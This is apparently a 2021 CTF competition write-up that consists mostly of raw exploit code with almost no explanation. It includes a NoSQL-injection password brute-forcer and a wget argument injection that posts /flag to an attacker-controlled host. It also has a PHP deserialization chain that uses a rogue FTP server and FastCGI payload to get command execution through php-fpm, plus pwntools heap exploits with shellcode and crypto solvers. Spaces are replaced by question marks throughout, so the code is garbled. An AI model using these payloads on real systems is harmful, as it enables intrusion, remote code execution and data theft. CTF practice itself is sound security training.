陇原战“疫”2021-WriteUp

import?time
import?requests
import?string

session?=?requests.session()
chars?=?string.printable
password?=?''

burp0_url?=?"http://d8304b2c-689b-4b9f-844a-1c3358bb57de.node4.buuoj.cn:81/login"
burp0_headers?=?{"Cache-Control":?"max-age=0",?"Origin":?"http://d8304b2c-689b-4b9f-844a-1c3358bb57de.node4.buuoj.cn:81",?"Upgrade-Insecure-Requests":?"1",?"DNT":?"1",?"Content-Type":?"application/x-www-form-urlencoded",?"User-Agent":?"Mozilla/5.0?(Windows?NT?10.0;?Win64;?x64)?AppleWebKit/537.36?(KHTML,?like?Gecko)?Chrome/95.0.4638.69?Safari/537.36",?"Accept":?"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",?"Referer":?"http://d8304b2c-689b-4b9f-844a-1c3358bb57de.node4.buuoj.cn:81/login",?"Accept-Encoding":?"gzip,?deflate",?"Accept-Language":?"zh-CN,zh;q=0.9",?"Connection":?"close"}

burp0_data?=?{"username":?"'||?this.password[0]?!=?'A')?{return?true;}})//",?"password":?"test"}
for?x?in?range(0,100):
????for?y?in?chars:
????????burp0_data['username']?=?"'||?this.password["?+?str(x)?+?"]?==?'"?+?y?+?"')?{return?true;}})//"
????????response?=?session.post(burp0_url,?headers=burp0_headers,?data=burp0_data)
????????#?print(response.text)
????????if?'successfully'?in?response.text:
????????????password?+=?y
????????????print(password)
????????????break
????????time.sleep(0.06)
#?username:admin
#?pwd:54a83850073b0f4c6862d5a1d48ea84f

/wget?argv=aa&argv=--post-file=/flag&argv=vpsip:port

?code=O%3A4%3A"Esle"%3A1%3A%7Bs%3A2%3A"xx"%3BO%3A6%3A"Bypass"%3A1%3A%7Bs%3A4%3A"str4"%3Bs%3A7%3A"phpinfo"%3B%7D%7D

file_put_contents打fpm，可以出网，参考蓝帽杯的One Pointer PHP，比如http://www.yang99.top/index.php/archives/52/#%E8%93%9D%E5%B8%BD%E6%9D%AF2021onepointerphp，这里用的是fpm的默认9000端口,vps上跑一个evil ftp，代码如下

import?socket
s?=?socket.socket(socket.AF_INET,?socket.SOCK_STREAM)
s.bind(('0.0.0.0',?10004))
s.listen(1)
conn,?addr?=?s.accept()
conn.send(b'220?welcome\n')
#Service?ready?for?new?user.
#Client?send?anonymous?username
#USER?anonymous
conn.send(b'331?Please?specify?the?password.\n')
#User?name?okay,?need?password.
#Client?send?anonymous?password.
#PASS?anonymous
conn.send(b'230?Login?successful.\n')
#User?logged?in,?proceed.?Logged?out?if?appropriate.
#TYPE?I
conn.send(b'200?Switching?to?Binary?mode.\n')
#Size?/
conn.send(b'550?Could?not?get?the?file?size.\n')
#EPSV?(1)
conn.send(b'150?ok\n')
#PASV
conn.send(b'227?Entering?Extended?Passive?Mode?(127,0,0,1,0,9000)\n')?#STOR?/?(2)
conn.send(b'150?Permission?denied.\n')
#QUIT
conn.send(b'221?Goodbye.\n')
conn.close()

<?php
class?Check?{
????public?static?$str1?=?false;
????public?static?$str2?=?false;
}

class?Esle?{
????public?$xx;
}

class?Hint?{
????public?function?__wakeup(){
????????$this->hint?=?"no?hint";
????}
????public?function?__destruct(){
????????if(!$this->hint){
????????????$this->hint?=?"phpinfo";
????????????($this->hint)();
????????}
????}
}

class?Bunny?{
????public?$filename;
????public?$data;
}
class?Welcome?{
????public?$username;
}
class?Bypass?{
????public?$str4;
}
$realdata="%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%02%1E%00%00%11%0BGATEWAY_INTERFACEFastCGI%2F1.0%0E%04REQUEST_METHODPOST%0F%0ASCRIPT_FILENAME%2Ftmp%2F1.php%0B%06SCRIPT_NAME%2F1.php%0C%0EQUERY_STRINGcommand%3Dwhoami%0B%15REQUEST_URI%2F1.php%3Fcommand%3Dwhoami%0C%06DOCUMENT_URI%2F1.php%09%80%00%00%B3PHP_VALUEunserialize_callback_func+%3D+system%0Aextension_dir+%3D+%2Ftmp%0Aextension+%3D+fpm-exp.so%0Adisable_classes+%3D+%0Adisable_functions+%3D+%0Aallow_url_include+%3D+On%0Aopen_basedir+%3D+%2F%0Aauto_prepend_file+%3D+%0F%0DSERVER_SOFTWARE80sec%2Fwofeiwo%0B%09REMOTE_ADDR127.0.0.1%0B%04REMOTE_PORT9000%0B%09SERVER_ADDR127.0.0.1%0B%02SERVER_PORT80%0B%09SERVER_NAMElocalhost%0F%08SERVER_PROTOCOLHTTP%2F1.1%0E%02CONTENT_LENGTH49%01%04%00%01%00%00%00%00%01%05%00%01%001%00%00%3C%3Fphp+system%28%24_REQUEST%5B%27command%27%5D%29%3B+phpinfo%28%29%3B+%3F%3E%01%05%00%01%00%00%00%00";
$e?=?new?Esle();
$a?=?new?Bypass();
$b?=?new?Welcome();
$c?=?new?Bunny();
$c->filename="ftp://aa:passwd@vpsip:port/test.txt";
$c->data=urldecode($realdata);
$b->username=$c;
$a->str4=$b;
$e->xx=$a;
echo?urlencode(serialize($e));

from?pwn?import?*
from?parse?import?*
from?pwnlib.util.iters?import?bruteforce
import?string
from?hashlib?import?sha256
import?hashlib

def?brute_force(prefix,s):
????return?bruteforce(lambda?x:sha256((x+prefix).encode("ascii")).hexdigest()==s,string.ascii_letters+string.digits,length=4,method='fixed')


r=remote('node4.buuoj.cn',27219)
pow_line?=?r.recvline().decode("ascii")
pow_prefix,?pow_hash?=?parse("[+]?sha256(XXXX+{})?==?{}\n",pow_line)

r.recvuntil('Give?Me?XXXX?:')
r.sendline(brute_force(pow_prefix,pow_hash))

r.recvuntil('2.Go?away\n')
r.sendline('1')
r.recvuntil('\n')
r.sendline('Princepermission')
r.recvuntil('She?will?play?with?you\n')

self_iv?=?r.recvline()[6:-1]

r.recvuntil('3.say?Goodbye\n')

r.sendline('1')
r.recvuntil("Here?you?are~\n")
permission?=?r.recvline()[11:-1]
prince_permission=permission[:16]

r.sendline('2')
r.recvuntil('Give?me?your?permission:\n')
r.sendline(self_iv)
r.recvuntil('Miao~?\n')
r.sendline(b'\x00'*16)
r.recvuntil('The?message?is?')
plain_prev=r.recvline()[:-1]
iv_prev=bytes([a^b??for?(a,b)?in?zip(plain_prev,?b'Princepermission')?])

r.sendline('2')
r.recvuntil('Give?me?your?permission:\n')
r.sendline(self_iv+prince_permission)
r.recvuntil('Miao~?\n')
r.sendline(iv_prev)
r.recvuntil('The?message?is?')
plain=r.recvline()[:-1]

print(plain)

r.recvuntil('Give?me?your?permission:\n')
r.sendline(self_iv+prince_permission)
r.recvuntil("What's?the?cat?tell?you?\n")
r.sendline(iv_prev)

r.interactive()

from?sage.modules.free_module_integer?import?IntegerLattice

e?=?[151991736758354,115130361237591,58905390613532,130965235357066,74614897867998,48099459442369,45894485782943,7933340009592,25794185638]

W?=?[[-10150241248,-11679953514,-8802490385,-12260198788,-10290571893,-334269043,-11669932300,-2158827458,-7021995],\
[52255960212,48054224859,28230779201,43264260760,20836572799,8191198018,14000400181,4370731005,14251110],\
[2274129180,-1678741826,-1009050115,1858488045,978763435,4717368685,-561197285,-1999440633,-6540190],\
[45454841384,34351838833,19058600591,39744104894,21481706222,14785555279,13193105539,2306952916,7501297],\
[-16804706629,-13041485360,-8292982763,-16801260566,-9211427035,-4808377155,-6530124040,-2572433293,-8393737],\
[28223439540,19293284310,5217202426,27179839904,23182044384,10788207024,18495479452,4007452688,13046387],\
[968256091,-1507028552,1677187853,8685590653,9696793863,2942265602,10534454095,2668834317,8694828],\
[33556338459,26577210571,16558795385,28327066095,10684900266,9113388576,2446282316,-173705548,-577070],\
[35404775180,32321129676,15071970630,24947264815,14402999486,5857384379,10620159241,2408185012,7841686]]

c?=?"1070260d8986d5e3c4b7e672a6f1ef2c185c7fff682f99cc4a8e49cfce168aa0"

def?CVP(lattice,?target):
????print("executing?Gram_Schmidt")
????gram?=?lattice.gram_schmidt()[0]
????print("Finish")
????t?=?target
????for?i?in?reversed(range(lattice.nrows())):
????????c?=?((t?*?gram[i])?/?(gram[i]?*?gram[i])).round()
????????t?-=?lattice[i]?*?c
????return?target?-?t

A?=?matrix(ZZ,?W)
B?=?matrix(ZZ,?W)

print("Executing?LLL")
lattice?=?IntegerLattice(B,?lll_reduce=True)
print("Finish")

target?=?vector(ZZ,?e)
P=CVP(lattice.reduced_basis,target)

solution=A.solve_left(P)

import?hashlib
from?Crypto.Cipher?import?AES

c?=?"1070260d8986d5e3c4b7e672a6f1ef2c185c7fff682f99cc4a8e49cfce168aa0"
M=[877,?619,?919,?977,?541,?941,?947,?1031,?821]
key?=?hashlib.sha256(str(M).encode()).digest()
cipher?=?AES.new(key,?AES.MODE_ECB)

#?_*_?coding:utf-8?_*_
from?pwn?import?*
context.log_level?=?'debug'
context.terminal=['tmux',?'splitw',?'-h']
prog?=?'./pwn1'
#elf?=?ELF(prog)#nc?121.36.194.21?49155
#?p?=?process(prog,env={"LD_PRELOAD":"./libc-2.23.so"})
#?libc?=?ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
p?=?remote("node4.buuoj.cn",?28232)#nc?124.71.130.185?49155
def?debug(addr,PIE=True):?
????debug_str?=?""
????if?PIE:
????????text_base?=?int(os.popen("pmap?{}|?awk?'{{print?$1}}'".format(p.pid)).readlines()[1],?16)?
????????for?i?in?addr:
????????????debug_str+='b?*{}\n'.format(hex(text_base+i))
????????gdb.attach(p,debug_str)?
????else:
????????for?i?in?addr:
????????????debug_str+='b?*{}\n'.format(hex(i))
????????gdb.attach(p,debug_str)?

def?dbg():
????gdb.attach(p)
#-----------------------------------------------------------------------------------------
s???????=?lambda?data???????????????:p.send(str(data))????????#in?case?that?data?is?an?int
sa??????=?lambda?delim,data?????????:p.sendafter(str(delim),?str(data))?
sl??????=?lambda?data???????????????:p.sendline(str(data))?
sla?????=?lambda?delim,data?????????:p.sendlineafter(str(delim),?str(data))?
r???????=?lambda?numb=4096??????????:p.recv(numb)
ru??????=?lambda?delims,?drop=True??:p.recvuntil(delims,?drop)
it??????=?lambda????????????????????:p.interactive()
uu32????=?lambda?data???:u32(data.ljust(4,?'\0'))
uu64????=?lambda?data???:u64(data.ljust(8,?'\0'))
bp??????=?lambda?bkp????????????????:pdbg.bp(bkp)
li??????=?lambda?str1,data1?????????:log.success(str1+'========>'+hex(data1))


def?dbgc(addr):
????gdb.attach(p,"b*"?+?hex(addr)?+"\n?c")

def?lg(s,addr):
????print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

def?choice(idx):
????sla("your?choice",str(idx))


def?exp():

????#?debug([0x400903,0x4008b3],0)
????#?choice(1)
????#?sla("size:",0x400)
????#?sla("content:",'a'*0x400)

????choice(0)
????sla("address:",(6295592))
????#?debug([0x4007fd],0)
????sa("content:",p16(0x62a4))
????#?dbg()
????it()
if?__name__?==?'__main__':
????exp()

#?giantbranch@ubuntu:/mnt/hgfs/ctf/2021_L隆源疫情/pwn11$?one_gadget?-l?2?libc-2.23.so?
#?0x45216?execve("/bin/sh",?rsp+0x30,?environ)
#?constraints:
#???rax?==?NULL

#?0x4526a?execve("/bin/sh",?rsp+0x30,?environ)
#?constraints:
#???[rsp+0x30]?==?NULL

#?0xcd0f3?execve("/bin/sh",?rcx,?r12)
#?constraints:
#???[rcx]?==?NULL?||?rcx?==?NULL
#???[r12]?==?NULL?||?r12?==?NULL

#?0xcd1c8?execve("/bin/sh",?rax,?r12)
#?constraints:
#???[rax]?==?NULL?||?rax?==?NULL
#???[r12]?==?NULL?||?r12?==?NULL

#?0xf02a4?execve("/bin/sh",?rsp+0x50,?environ)
#?constraints:
#???[rsp+0x50]?==?NULL

#?0xf02b0?execve("/bin/sh",?rsi,?[rax])
#?constraints:
#???[rsi]?==?NULL?||?rsi?==?NULL
#???[[rax]]?==?NULL?||?[rax]?==?NULL

#?0xf1147?execve("/bin/sh",?rsp+0x70,?environ)
#?constraints:
#???[rsp+0x70]?==?NULL

#?0xf66f0?execve("/bin/sh",?rcx,?[rbp-0xf8])
#?constraints:
#???[rcx]?==?NULL?||?rcx?==?NULL
#???[[rbp-0xf8]]?==?NULL?||?[rbp-0xf8]?==?NULL

#?_*_?coding:utf-8?_*_
from?pwn?import?*
context.log_level?=?'debug'
context.terminal=['tmux',?'splitw',?'-h']
prog?=?'./Magic'
#elf?=?ELF(prog)#nc?121.36.194.21?49155
#?p?=?process(prog,env={"LD_PRELOAD":"./libc/libc-2.23.so"})
libc?=?ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
p?=?remote("node4.buuoj.cn",?25680)#nc?124.71.130.185?49155
def?debug(addr,PIE=True):?
????debug_str?=?""
????if?PIE:
????????text_base?=?int(os.popen("pmap?{}|?awk?'{{print?$1}}'".format(p.pid)).readlines()[1],?16)?
????????for?i?in?addr:
????????????debug_str+='b?*{}\n'.format(hex(text_base+i))
????????gdb.attach(p,debug_str)?
????else:
????????for?i?in?addr:
????????????debug_str+='b?*{}\n'.format(hex(i))
????????gdb.attach(p,debug_str)?

def?dbg():
????gdb.attach(p)
#-----------------------------------------------------------------------------------------
s???????=?lambda?data???????????????:p.send(str(data))????????#in?case?that?data?is?an?int
sa??????=?lambda?delim,data?????????:p.sendafter(str(delim),?str(data))?
sl??????=?lambda?data???????????????:p.sendline(str(data))?
sla?????=?lambda?delim,data?????????:p.sendlineafter(str(delim),?str(data))?
r???????=?lambda?numb=4096??????????:p.recv(numb)
ru??????=?lambda?delims,?drop=True??:p.recvuntil(delims,?drop)
it??????=?lambda????????????????????:p.interactive()
uu32????=?lambda?data???:u32(data.ljust(4,?'\0'))
uu64????=?lambda?data???:u64(data.ljust(8,?'\0'))
bp??????=?lambda?bkp????????????????:pdbg.bp(bkp)
li??????=?lambda?str1,data1?????????:log.success(str1+'========>'+hex(data1))


def?dbgc(addr):
????gdb.attach(p,"b*"?+?hex(addr)?+"\n?c")

def?lg(s,addr):
????print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

def?choice(idx):
????sla("Input?your?choice:?",str(idx)+'\n\n')
????#?sla("Input?your?choice:?",str(idx))

def?add(idx):
????choice(1)
????sa("Input?the?idx",str(idx)+'\x00\x00\x00')
????#?sl('\n\n')
????#?sla("Size:?",sz)
????#?sa("content?",cno)

def?delete(idx):

????choice(3)
????sa("Input?the?idx",str(idx)+'\x00\x00\x00')
????#?sl('\n\n')

#?def?show(idx):
#???choice(3)
#???sla("Index:?",idx)

def?edit(idx,con):
????choice(2)
????sa("Input?the?idx",str(idx)+'\x00\x00\x00')
????#?sl('\n')
????#?sla("size?",sz)
????sa("Input?the?Magic",con)



def?exp():
????#?debug([0x13aa])
????add(0)
????edit(0,'a'*8)
????#?delete(0)
????ru('a'*8)
????data?=?uu64(r(6))
????lg('data',data)
????addr?=?data?-?0x7fe66967cd98?+?0x7fe6692b8000
????mh?=?addr?+?libc.sym['__malloc_hook']
????rh?=?addr?+?libc.sym['realloc']
????lg('addr',addr)
????one?=?addr?+?0x4527a
#-----------------------------
????delete(0)
????edit(0,p64(mh-0x23))
????add(0)
????add(1)
????lg('rh',rh)
????edit(1,(0x13-8)*'a'+p64(one)+p64(rh+13))
????#?dbg()

????add(0)



????it()
if?__name__?==?'__main__':
????exp()

解题思路

查看字符串就有

puts("Please?input?your?flag:");
??scanf("%s",?Str);
??if?(?sub_401610(Str)?)
??{
????if?(?off_403844("SETCTF2021",?Str)?)
??????printf("Success!");
????else
??????printf("Wrong!");
??}